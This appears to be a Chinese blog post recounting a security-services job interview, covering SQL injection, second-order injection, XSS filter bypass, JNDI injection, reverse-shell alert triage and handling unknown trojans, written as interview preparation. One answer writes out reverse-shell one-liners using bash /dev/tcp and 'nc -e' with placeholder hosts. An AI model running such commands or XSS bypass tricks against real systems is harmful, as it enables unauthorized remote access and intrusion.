面试篇——某集成商安服

某f师傅在家摆烂三个月终于决定起床找份工作，简历还没改好居然就有人上门让f师傅面试了！以下面试过程为f师傅面试中真实遇到的问题及真实答题情况，所有厂商信息为虚拟，请勿对号入座！

公司：某安全集成商

薪资范围：7-10k

要求：

1.熟悉安全产品

2.研判、应急

3.熟悉常见网络故障并有处理能力

4.数据梳理、风险检测

......

要求看着不算高，也不要求要证书，f师傅穿戴整齐等待面试。

叮铃铃！

电话响起面试开始↓

面试官：常见web漏洞类型有哪些？

f师傅：owasp top10；shiro、weblogic、fastjson反序列化三兄弟等组件漏洞；未授权、权限绕过等等。（太多了大家自有发挥就得了）

面试官：Sql注入漏洞成因？

f师傅：参数过滤不严格，攻击者通过构造绕过语句和sql语句结合实现数据库操作，形成SQL注入攻击。

面试官：如果没有办法增加安全设备，也不能修改代码，如何防范sql注入？

（up看到忍不住说一句，6！）

f师傅：在确定存在该漏洞的情况下，sql注入的利用是需要对参数进行操作的，可以对相关利用路径进行白名单过滤，可以进行403bypass测试一下是否还有绕过的风险，以上操作修改中间件配置即可，无需修改代码。

面试官：二次注入的原理？

f师傅：二次注入是指已存储（数据库、文件）的用户输入被读取后再次进入到 SQL 查询语句中导致的注入。

二次注入是sql注入的一种，但是比普通sql注入利用更加困难，利用门槛更高。普通注入数据直接进入到 SQL 查询中，而二次注入则是输入数据经处理后存储，取出后，再次进入到 SQL 查询。（肥师傅不记得怎么答的了，up直接抄作业。）

面试官：Xss有哪些种类？

f师傅：反射型、储存型、Dom型。

面试官：如果网站对<>标签进行了拦截，且对大小写、复写等进行了过滤，如何测试xss？

f师傅：尝试对<>进行编码，并测试相关非弹窗语句是否生效，正常来说如果没有waf，只是通过代码进行过滤可能只是针对部分弹窗测试、敏感函数进行了限制，可以先插入img试试是否成功。

面试官：jndi注入原理

f师傅：jndi是java的一个接口，当参数可控时攻击者可以将恶意执行代码通过jndi注入攻击载荷，实现攻击。（参考答案：JNDI 注入，即当开发者在定义 JNDI 接口初始化时，lookup() 方法的参数被外部攻击者可控，攻击者就可以将恶意的 url 传入参数，以此劫持被攻击的Java客户端的JNDI请求指向恶意的服务器地址，恶意的资源服务器地址响应了一个恶意Java对象载荷（reference实例 or 序列化实例），对象在被解析实例化，实例化的过程造成了注入攻击。）

面试官：写一句反弹shell

f师傅： bash -i >& dev/tcp/ip/port 0>&1(nc：nc -e /bin/bash IP port)

面试官：出现反弹shell告警如何确认是否为真实攻击？

f师傅：定位bash、nc关键字，从实际经验出发部分远程ssh连接也会出现类似告警，主要以已执行命令作为判断依据。

面试官：如果出现未知类型木马如何处理？

f师傅：先取得样本，可以通过云沙箱或者本地隔离沙箱进行动态分析，如果是已知木马的变种可以通过云沙箱查出来。如果确认是完全没有出现过的木马，进行动态分析后，确认该木马会做的行为、对系统造成的影响等，根据分析结果对已遭受影响的系统做相应应急响应操作和修复工作。

以上！一面即是技术面，已经结束，等待肥师傅二面的好消息。

...

未完待续

原文始发于微信公众号（一己之见安全团队）：面试篇——某集成商安服